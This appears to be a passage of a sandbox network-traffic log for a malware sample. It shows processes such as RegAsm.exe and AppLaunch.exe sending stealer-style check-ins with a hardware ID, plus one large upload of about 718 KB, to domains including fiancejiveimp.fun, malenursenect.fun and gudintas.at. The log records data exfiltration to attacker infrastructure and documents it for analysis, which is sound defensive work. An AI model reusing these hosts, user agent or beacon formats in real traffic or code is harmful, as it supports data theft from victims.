                                                                    CF-RAY: 81039fb8ce532d16-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:41.106484890 CEST6581INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    75192.168.2.349912104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:39.119782925 CEST6578OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:39.121269941 CEST6578OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:41.022811890 CEST6579INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=gr5g1d4kbtk9ph1ltmioi5d6m7; expires=Sat, 27 Jan 2024 01:42:19 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:40 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KDdp6VmKuGbhSz9oH0zNnRaY40vPUQhZKCXMV5MEF3eB91PUQ%2BrjZXMG6TXEZ7NuVIpPiO1%2FajJAP%2BnZlnB8gN3xaMPzNEU96Al2VGznyW9O9lLTRsNfrXBo8%2FE0b5Xysifnpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039fc1b9b42066-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:41.022849083 CEST6579INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    76192.168.2.349913104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:41.336431980 CEST6582OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:41.336878061 CEST6582OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:44.403184891 CEST7418INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=hd10mk4506obl5a96bjunoant6; expires=Sat, 27 Jan 2024 01:42:23 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:44 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fBZzbhlf8STLH8Ab0wf4Lvt%2B%2BEjFmzlIzGdptxUdYbNAT%2FK6B5dCr043QpxHW1AuhmifGWiI3950YSfwn2hwn1YC%2BaR8h8fFBu2RsyFQz1s7i1c%2B1Q4RpGAFEnKzh2Om9OpEMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039fcf9dee0815-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:44.403260946 CEST7418INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    77192.168.2.349914104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:41.539503098 CEST6583OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 718251
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:41.540349007 CEST6594OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:41.635037899 CEST6595OUTData Raw: f5 b7 f2 3f a9 43 63 ff 25 f4 7e 11 f7 43 3d 20 1f 27 dc 16 d5 ed a1 8f af a5 ef b4 7c 7d 7d 4c d4 e2 c0 be 69 3e 66 8c d3 b1 dc 32 b8 be f5 5a c2 6b aa cc f5 6f f9 02 e3 75 1b fb e7 47 f7 23 89 43 c0 b9 3d f8 dd 04 de 9b 50 0f 88 f7 53 d4 e8 71
                                                                    Data Ascii: ?Cc%~C= '|}}Li>f2ZkouG#C=PSq&}w?3?L{/Agb`L9?G9s8t&Of~-8FIc13ueN_D_}g6Yp5{XFRu/UW\]w)
                                                                    Oct 3, 2023 09:55:41.635524988 CEST6598OUTData Raw: 50 bf 27 79 3d ca 8e 85 65 59 a9 43 ea ba e6 9a 6b 0a 2f ef e3 79 c2 9e 6e 0c d8 13 73 24 2b fe 9f f2 42 61 4b 96 8e 2e cd b2 58 55 56 7d d6 f2 45 db 80 db ac fc cf 57 07 6e ab af 2e d5 ef e9 f2 59 ed 51 0d 25 af 3f 8d ff a5 d5 d9 f2 bf d6 06 61
                                                                    Data Ascii: P'y=eYCk/yns$+BaK.XUV}EWn.YQ%?a/k~^g1?!_!@+<~25P8"3OHx4}/f=s=k2C-U{%=?K'r46V>eM!`}r?+3+Z?~[;d*!aNd{
                                                                    Oct 3, 2023 09:55:41.635559082 CEST6601OUTData Raw: bb fe 1a 7e 07 df ef bd 61 87 fb dd 43 0f ba 3d 03 ee b7 29 60 7e e1 67 f4 7d e3 67 1e 48 e5 7d cc a8 2c 8d a3 95 ab a2 c7 2f 97 f8 1c 7e d7 df c8 f1 58 1b c8 9c 4f b5 80 aa ff d3 df 4b a3 75 cb a7 e4 01 51 7f e0 98 fb 29 a7 8d b6 61 05 f9 e5 a2
                                                                    Data Ascii: ~aC=)`~g}gH},/~XOKuQ)a/t|Lx~ghq/=b\%;2~/, su%3K=>[eKN/oyX''/gk)c_[Y2dX/W
                                                                    Oct 3, 2023 09:55:41.635591030 CEST6602OUTData Raw: fd ff d4 eb 7f 2a e3 fa a7 7a bc d7 ff 64 ce eb 1f d8 1d 6a f6 90 e3 31 03 ec b9 fe a7 e6 24 ee 39 89 eb 7f 2a 79 fd 57 fd c3 7d 8b f7 3a bd 37 62 bb 90 59 f2 32 ba 3d 17 3e f3 3c 87 4c 14 cf 53 3c 47 f1 5e 66 1d 3f 5c 87 ef 2f ef d8 0f eb c2 fd
                                                                    Data Ascii: *zdj1$9*yW}:7bY2=><LS<G^f?\/WawO>9uQa~c`)+R%ukeU>mmfY}W}f'!|_5?@5"/IBd9Op%d>=o0.+:?=n.
                                                                    Oct 3, 2023 09:55:41.635605097 CEST6604OUTData Raw: 76 a7 a6 d3 f4 9e cf eb e0 7b 3f e7 8b e2 67 9b e6 b5 e7 3c 52 c8 f6 f8 dd 19 e6 fd 60 ee c7 f1 35 d8 12 8c 70 5e 92 bf 31 af c3 f1 37 4e d3 31 ab 35 56 e7 e5 2d 3e 83 e5 78 1a f3 0d 5d 4e cd 3b de 9f 9c d3 c3 51 70 59 d6 10 5a 5c 42 a7 23 37 64
                                                                    Data Ascii: v{?g<R`5p^17N15V->x]N;QpYZ\B#7d!j,EMvn}=dc?ciE#.A:u#Kyf}b.Gh8u1OsQ?wVfQQy0i^qO.m?Y7
                                                                    Oct 3, 2023 09:55:41.635618925 CEST6606OUTData Raw: 7c a2 bf d1 3f 58 59 5f f8 4c 20 1e 88 79 7d d9 cf 6a 9a 34 0c a8 15 64 06 67 e9 f0 b4 9e 23 d6 3d 22 95 ef a5 d9 c5 27 ec 14 f3 3b 1d d3 b1 ce 84 fd 80 99 05 a2 de 84 c7 a3 cc 0b 51 93 72 c8 e5 7f 1f f2 bf 8f 7c ea 85 ee 86 ef 7e dd fd fb dd bf
                                                                    Data Ascii: |?XY_L y}j4dg#="';Qr|~=s?.JaO|n5'chsqvKhq<Yao=/r-v!G`}nxN"!?<r_?0(=aq?DgsW6wq?m
                                                                    Oct 3, 2023 09:55:41.635659933 CEST6609OUTData Raw: 16 ad 73 45 cf 45 eb dc 56 de 5e f7 f5 8f cb 29 f7 b3 ee 51 18 f3 8f df 5f 68 59 be cf ea 3d 91 b5 80 96 66 db 77 7f c6 7b b8 b5 3c bf bb c1 e7 43 9e fc 54 fa 2c 5b 08 5c 50 a7 2f 99 9a d3 e3 bf 8b 2c 0f e3 68 a4 e9 ec 7d ef ec 90 01 a6 3e ff a7
                                                                    Data Ascii: sEEV^)Q_hY=fw{<CT,[\P/,h}>RO1;4f)}L7eck'\j5riq)+j"mk.9 &_f'quOSOuyDsNI>c1WRN(eK_K}.X
                                                                    Oct 3, 2023 09:55:41.635698080 CEST6611OUTData Raw: 36 c6 cb 28 f3 93 3a 79 3d 58 0f 33 37 4b 0f c8 eb 60 0d 1f fb 14 b3 e9 b6 71 fe 13 dd 5e 6d 1f e7 3a e6 f5 61 ac 43 4b d3 c5 0c 88 cf 53 8b 95 71 9f 97 f5 5c d6 71 e5 fa 70 39 3e f7 70 3a 7e e2 39 64 b5 9d eb e4 f3 ca ba ee 78 bf d4 de ff 9f 57
                                                                    Data Ascii: 6(:y=X37K`q^m:aCKSq\qp9>p:~9dxWJZ'2p/(qO%|eq{}c3nu~e;JcZkQ2~&2s}88|BQ.,Ngi),.zp,fZIk}ry
                                                                    Oct 3, 2023 09:55:41.635730982 CEST6614OUTData Raw: 38 25 2f cb 7e c0 7c 3f 56 bb f0 82 f3 7a b6 69 ff e9 f1 54 db 6f f1 58 c2 b2 ca 0f 9b 71 fb 8b 5a d3 f5 f3 3a f2 ac fb 80 25 13 b1 55 dd 3f fb 04 eb a9 62 4d ef df aa fb bf 89 73 6a 14 ac f7 fc 18 0b 7e f7 da 81 39 ec a0 a5 e3 09 d3 69 07 2f 9b
                                                                    Data Ascii: 8%/~|?VziToXqZ:%U?bMsj~9i/0bs>i0yXvT*T;lE1Sl@I;j+lg=u\vxu~"\f!o;}m@Ve5m
                                                                    Oct 3, 2023 09:55:45.898035049 CEST7424INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=g4ao80a3uihhden3r3q8ocqg4a; expires=Sat, 27 Jan 2024 01:42:24 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:45 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ndvGzV4XVU2RYPWbM5q4YQ4MznisO2xdykqZ%2FAVKZGC2bNEI6gLKcAJl1bZMiJNf7X2JbepgVwInrqNghAG24RTrd6VjhkyB9hsGw1YEtllbCEM4rtVDI8VtbVuz05SLRUGwIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039fd0df750835-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:45.898097992 CEST7424INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    78192.168.2.349915172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:44.626358986 CEST7418OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:44.632916927 CEST7419OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:44.998611927 CEST7420INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=aj2d9fu544c099cg4jj9pm4mun; expires=Sat, 27 Jan 2024 01:42:23 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:44 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BSVXMbr6IG8vZmwc7BZ9BmpWSFALbbVtXdAfVUt%2BEWuXB6LxiMXLcoiB2p%2FSfPbElBe3EqHXTl8lSaAlIJzqN8ksAlkWweumBtFJ9Ss9b3gLgbDmbqvt6hrV%2F%2BfCgXMakGB8Qg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039fe429f60593-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:44.998677969 CEST7420INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    79192.168.2.349916172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:45.229557037 CEST7421OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:45.231204987 CEST7422OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:45.613132000 CEST7423INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=h57kilvd02sdh8tapmlluf0cr2; expires=Sat, 27 Jan 2024 01:42:24 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:45 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RKpwWSJFaXoG7e6Najly54KBKrCkvuQceYekhJ3VqJs6Qh7ODyOZZpQ2RskNEMqoGaHRT314zhkjUBSSIB%2BdjbQtuXImOxfDj1dtw2H9zFIWhSHFkZDSr2NXyFX8jyt8x9pXEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039fe7eec93ae4-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:45.613202095 CEST7423INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    8192.168.2.349813186.182.55.4480C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:02.844602108 CEST1555OUTPOST /tmp/ HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://seqlxfb.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 284
                                                                    Host: gudintas.at
                                                                    Oct 3, 2023 09:55:02.844633102 CEST1556OUTData Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 62 26 ce e0
                                                                    Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA -[k,vub&ws%/s)bsq9&W22L59Wx"W= 6_- Zs"];@!lkU}n=w|xXhg<j
                                                                    Oct 3, 2023 09:55:03.776099920 CEST1556INHTTP/1.0 404 Not Found
                                                                    Date: Tue, 03 Oct 2023 07:55:03 GMT
                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                    X-Powered-By: PHP/7.4.15
                                                                    Content-Length: 331
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    80192.168.2.349918172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:48.511243105 CEST7432OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:48.511986017 CEST7432OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:48.844564915 CEST7434INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=7ki7imlscefafasnntkabctmcp; expires=Sat, 27 Jan 2024 01:42:27 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:48 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g92OJN61SNdspWmlCpwO3DBv0f%2BkQUp4yKbruXUKUF%2FqyB43RBT1%2F7xH%2BfXLddFIq2mVQxAGQ0tGzQ3D1hqleYBRNk55IRtoji59DP8y3hsA7ikmfPYovQydqwGH9Wk1Gpg8Ag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039ffc6acf07d4-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:48.844619989 CEST7434INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    81192.168.2.349919172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:49.102274895 CEST7434OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:49.102689028 CEST7435OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
